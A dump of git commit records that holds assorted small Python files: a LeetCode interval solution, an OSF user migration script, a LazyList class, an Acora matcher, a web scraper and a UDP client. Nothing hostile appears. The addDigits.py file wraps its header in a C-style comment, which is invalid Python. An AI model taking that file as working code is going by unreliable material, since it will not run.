min_val = sys.maxint
for j in xrange(len(intervals)):
if i == j:
continue
if intervals[i].end <= intervals[j].start < min_val:
min_index = j
min_val = intervals[j].start
result.append(min_index)
return result
class Test(unittest.TestCase):
def test(self):
self._test([[1, 2]], [-1])
self._test([[3, 4], [2, 3], [1, 2]], [-1, 0, 1])
self._test([[1, 4], [2, 3], [3, 4]], [-1, 2, -1])
def _test(self, intervals, expected):
intervals = [Interval(a[0], a[1]) for a in intervals]
actual = Solution().findRightInterval(intervals)
self.assertEqual(actual, expected)
if __name__ == '__main__':
unittest.main()
| Python | 0.999464 | |
5a857703de5fc1e67e958afb41a10db07b98bfa1 | Add migration script to fix valid users with date_confirmed==None | scripts/migrate_unconfirmed_valid_users.py | scripts/migrate_unconfirmed_valid_users.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to migrate users with a valid date_last_login but no date_confirmed."""
import sys
import logging
from website.app import init_app
from website.models import User
from scripts import utils as script_utils
from tests.base import OsfTestCase
from tests.factories import UserFactory
from modularodm import Q
import datetime as dt
logger = logging.getLogger(__name__)
def do_migration(records):
for user in records:
user.date_confirmed = user.date_last_login
if not user.is_registered:
user.is_registered = True
logger.info('Finished migrating user {0}'.format(user._id))
def get_targets():
return User.find(Q('date_confirmed', 'eq', None) & Q('date_last_login', 'ne', None))
def main():
init_app(routes=False) # Sets the storage backends on all models
if 'dry' in sys.argv:
for user in get_targets():
print(user)
else:
do_migration(get_targets())
class TestMigrateNodeCategories(OsfTestCase):
def test_get_targets(self):
test = User.find(Q('date_confirmed', 'ne', None) & Q('date_last_login', 'ne', None))
assert test is not None
def test_do_migration(self):
today = dt.datetime.utcnow()
user1 = UserFactory.build(date_confirmed=None, date_last_login=today, is_registered=False)
user2 = UserFactory.build(date_confirmed=None, date_last_login=today, is_registered=True)
user1.save()
user2.save()
user_list = User.find(Q('_id', 'eq', user1._id) | Q('_id', 'eq', user2._id))
do_migration(user_list)
assert user1.date_confirmed is today
assert user1.is_registered
assert user2.date_confirmed is today
assert user2.is_registered
if __name__ == '__main__':
script_utils.add_file_logger(logger, __file__)
main()
| Python | 0.000184 | |
e12371408af1682904483341fd1f41ef6034a17f | add test | OperateSystem/Ex1/Test/SellTest.py | OperateSystem/Ex1/Test/SellTest.py | # -*- coding: utf-8 -*-
__author__ = 'jayin'
import requests
import threading
def buy_ticket():
res = requests.get('http://localhost:8000/buy1')
print threading.currentThread().getName() + u' buy ticket ' + res.content
def main():
for x in range(1, 40):
t = threading.Thread(target=buy_ticket, name=x)
t.start()
if __name__ == '__main__':
main() | Python | 0.000002 | |
edeffbcbe8fb239553c73fa37e73c0188ffc2479 | Add unit test for retrieving credentials from environment variables | tests/test_cli.py | tests/test_cli.py | import sys
import fixtures
import imgurpython
import testtools
import imgur_cli.cli as cli
FAKE_ENV = {'IMGUR_CLIENT_ID': 'client_id',
'IMGUR_CLIENT_SECRET': 'client_secret',
'IMGUR_ACCESS_TOKEN': 'access_token',
'IMGUR_REFRESH_TOKEN': 'refresh_token',
'IMGUR_MASHAPE_KEY': 'mashape_key'}
class TestImgurCli(testtools.TestCase):
def make_env(self, exclude=None):
if not exclude:
exclude = []
env = {key: value for key, value in FAKE_ENV.items() if key not in exclude}
self.useFixture(fixtures.MonkeyPatch('os.environ', env))
def test_imgur_credentials_env(self):
self.make_env()
expected = ('client_id', 'client_secret', 'access_token', 'refresh_token',
'mashape_key')
imgur_credentials = cli.imgur_credentials()
self.assertEqual(expected, imgur_credentials)
self.make_env(exclude=['IMGUR_MASHAPE_KEY'])
expected = ('client_id', 'client_secret', 'access_token', 'refresh_token',
None)
imgur_credentials = cli.imgur_credentials()
self.assertEqual(expected, imgur_credentials)
self.make_env(exclude=['IMGUR_CLIENT_ID'])
self.assertRaises(imgurpython.client.ImgurClientError,
cli.imgur_credentials)
self.make_env(exclude=['IMGUR_CLIENT_SECRET'])
self.assertRaises(imgurpython.client.ImgurClientError,
cli.imgur_credentials)
| Python | 0 | |
4c148281ee8071ea8f150362388a44cf5c0895bf | Add exception classes. | tgif/exception.py | tgif/exception.py | """ All exceptions go here.
"""
class Friday(Exception):
""" Base exception in Friday game.
"""
class GameOver(Friday):
""" Indicats that the game is overed.
"""
| Python | 0 | |
ff079da977990b7d6e71c6d92c5a9299fa92d123 | Add module listtools implementing class LazyList. | photo/listtools.py | photo/listtools.py | """Some useful list classes.
**Note**: This module might be useful independently of photo-tools.
It is included here because photo-tools uses it internally, but it is
not considered to be part of the API. Changes in this module are not
considered API changes of photo-tools. It may even be removed from
future versions of the photo-tools distribution without further
notice.
"""
from collections import MutableSequence
class LazyList(MutableSequence):
"""A list generated lazily from an iterable.
LazyList provides list access to the sequence of elements from the
iterable. Elements are taken out lazily. That means, the
elements are taken from the iterable not before they are actually
accessed. Once taken out, the elements are stored in a
conventional list in order to provide random access. The string
representation operator of LazyList only displays the elements
taken out of the iterable so far.
Note: if the list is accessed at the end using negative indices,
all elements are taken from the iterable before returning the
result. Some operations implicitly access the list at the end and
thus take all elements from the iterable. These operations
include `len()` and `append()`. Do not access the list at the end
using negativ indices or append to the list if you cannot afford
to take all elements out of the iterable.
>>> l = LazyList((0, 1, 2, 3, 4))
>>> l
[]
>>> l[1]
1
>>> l
[0, 1]
>>> del l[1]
>>> l
[0]
>>> l[8]
Traceback (most recent call last):
...
IndexError: list index out of range
>>> l
[0, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> l[-2]
3
>>> l
[0, 1, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> list(l) == [0, 1, 2, 3, 4]
True
>>> l
[0, 1, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> len(l)
5
>>> l
[0, 1, 2, 3, 4]
>>> l = LazyList((0, 1, 2, 3, 4))
>>> l.append(5)
>>> l
[0, 1, 2, 3, 4, 5]
>>> def naturals():
... n = 0
... while True:
... yield n
... n += 1
...
>>> l = LazyList(naturals())
>>> l[1]
1
>>> l
[0, 1]
>>> l[4:2:-1]
[4, 3]
>>> l
[0, 1, 2, 3, 4]
>>> l[8]
8
>>> l
[0, 1, 2, 3, 4, 5, 6, 7, 8]
>>> l[17:11]
[]
>>> l
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
"""
def __init__(self, iterable):
self.iterable = iter(iterable)
self.elements = []
def _access(self, index):
"""Try to take out the elements covered by index from the iterable.
The argument may be an int or a slice. Do not raise an error,
even if not enough elements can be delivered by the iterable.
"""
m = 0
if isinstance(index, int):
m = index + 1 if index >= 0 else -1
elif isinstance(index, slice):
if index.step is not None and index.step < 0:
m = index.start + 1 if index.start >= 0 else -1
else:
m = index.stop if index.stop >= 0 else -1
while len(self.elements) < m or m < 0:
try:
self.elements.append(next(self.iterable))
except StopIteration:
break
def __len__(self):
self._access(-1)
return len(self.elements)
def __getitem__(self, index):
self._access(index)
return self.elements.__getitem__(index)
def __setitem__(self, index, value):
self._access(index)
self.elements.__setitem__(index, value)
def __delitem__(self, index):
self._access(index)
self.elements.__delitem__(index)
def insert(self, index, value):
self._access(index)
self.elements.insert(index, value)
def append(self, value):
self._access(-1)
self.elements.append(value)
def __nonzero__(self):
self._access(0)
return len(self) > 0
def __str__(self):
return str(self.elements)
def __repr__(self):
return repr(self.elements)
| Python | 0 | |
a6935d250dfdbc275ce450f813697b73ebc291e3 | Create addDigits.py | Puzzles/leetcode/April-9th-2016/addDigits.py | Puzzles/leetcode/April-9th-2016/addDigits.py | /*
[ref.href] leetcode.com/problems/add-digits
"
Given a non-negative integer num, repeatedly add all its digits
until the result has only one digit.
For example:
Given num = 38, the process is like: 3 + 8 = 11, 1 + 1 = 2.
Since 2 has only one digit, return it.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem
and creating all test cases.
"
*/
class Solution(object):
def addDigits(self, n):
"""
:type num: int
:rtype: int
"""
if n < 10:
return n
n = n % 10 + self.addDigits(n // 10)
return self.addDigits(n)
| Python | 0 | |
85142dd9f7413dcb7c214ec251d21c93517ce26c | add AcoraMatcher tool | AcoraMatcher.py | AcoraMatcher.py | # coding:utf-8
import cPickle
import json
import acora
from atma import tool
import collections
from itertools import groupby
class AcoraMatcher:
def __init__(self, spec_set, min_count=1, min_len=1):
key_lst = []
if type(spec_set) == dict or type(spec_set) == collections.Counter:
for spec, cnt in spec_set.items():
if cnt >= min_count and len(spec) >= min_len:
key_lst.append(spec)
elif type(spec_set) == list:
key_lst = spec_set
else:
print 'ERROR: wrong value type:', type(spec_set)
exit(-1)
self.builder = acora.AcoraBuilder(key_lst)
self.ac = self.builder.build()
def match(self, des, whole_match=True):
ret = []
letters = set("!\"$%&'()*+,.:;<>?@[\]^_`{|}~ -")
wrong_spec = ['other', 'no', 'A', 'none']
for kw, pos in self.ac.findall(des):
# print des[pos - 1] == ' '
# print des[pos: pos + len(kw)]
# print pos+len(kw) == len(des), len(des), pos, len(kw), des[pos + len(kw) - 1] in letters
if kw in wrong_spec:
continue
if not whole_match:
ret.append((kw, pos))
# remove non whole match
elif (pos == 0 or des[pos-1] in letters) and (pos+len(kw) == len(des) or des[pos+len(kw)] in letters):
ret.append((kw, pos))
return ret # return value format: [(match_string, start_pos)], start_pos starts from 0
@staticmethod
def longest_match(matches):
ret = []
matches = sorted(matches, key=lambda (x, y): (y, len(x) * -1))
last_end = 0
for m in matches:
if len(m[0]) + m[1] > last_end:
ret.append(m)
last_end = len(m[0]) + m[1]
return ret
@staticmethod
def distribution_counter(count_dic, items):
for i in items:
key = i
if key not in count_dic:
count_dic[key] = 1
else:
count_dic[key] += 1
| Python | 0 | |
7a880376e098f60b1666833bb6b14b359b0ebda5 | add fitness_spider.py | Exercise/fitness_spider.py | Exercise/fitness_spider.py | from bs4 import BeautifulSoup
import requests
from selenium import webdriver
import time
import sqlite3
from selenium import webdriver
import json
driver = webdriver.PhantomJS()
class Fitness:
i = 0
url = "http://www.hiyd.com/dongzuo/"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'
}
def get_info(self, url):
response = requests.get(url, headers=self.headers, timeout=5)
# driver.get(url)
soup = BeautifulSoup(response.text, "html.parser")
# soup = BeautifulSoup(driver.page_source, "html.parser")
text = str(soup.find_all("script")[-1])
# print(driver.page_source)
data_text = text.split("e.init(")[1].split(");")[0]
json_text = json.loads(data_text)
print(json_text)
if __name__ == "__main__":
spider = Fitness()
while spider.i < 1:
spider.i += 1
spider.get_info(spider.url + str(spider.i) + "/") | Python | 0.00231 | |
a8fd0bfa974ff818ec105a42c585bae48030a086 | Create notebooknetc.py | _src/om2py3w/3wex0/notebooknetc.py | _src/om2py3w/3wex0/notebooknetc.py | # _*_coding:utf-8_*_
# 客户端程序
from socket import *
import time
import notebooknets
def main():
BUF_SIZE = 65565
ss_addr = ('127.0.0.1', 8800)
cs = socket(AF_INET, SOCK_DGRAM)
while True:
global data
data = raw_input('Please Input data>')
cs.sendto(data, ss_addr)
data, addr = cs.recvfrom(BUF_SIZE)
print "Data: ", data
cs.close
notebooknets.history(data)
if __name__ == '__main__':
main()
| Python | 0.000002 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.